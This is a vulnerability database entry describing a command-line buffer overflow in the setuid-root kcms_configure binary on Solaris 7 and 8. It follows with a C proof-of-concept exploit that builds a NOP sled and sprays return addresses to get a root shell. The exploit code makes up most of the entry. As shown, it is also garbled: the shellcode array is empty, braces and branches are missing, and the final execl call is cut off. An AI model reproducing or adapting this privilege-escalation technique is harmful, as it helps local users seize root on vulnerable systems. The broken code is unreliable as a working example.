Solaris 7/8 kcms_configure Command-Line Buffer Overflow Vulnerability (1)

ID SSV:74602
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.

An exploit for x86 Solaris is available to attackers. 

 Command line argument overflow

 Proof of Concept Exploitation
 Riley Hassell

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN  1100

/* seteuid/exec shellcode  */
char shell[] =

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp() { __asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
        int i;
        if (argc > 1)
        offset = strtol(argv[1], NULL, 0);
             offset = -300;
            nop = 600;
        esp = get_esp();
        memset(buf, 0x90, BUFLEN);
        memcpy(buf+600, shell, strlen(shell));
        for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
        *((int *) &buf[i]) = esp+offset;
         buf[BUFLEN-1] = '\0';
        execl("/usr/openwin/bin/kcms_configure", "eEye",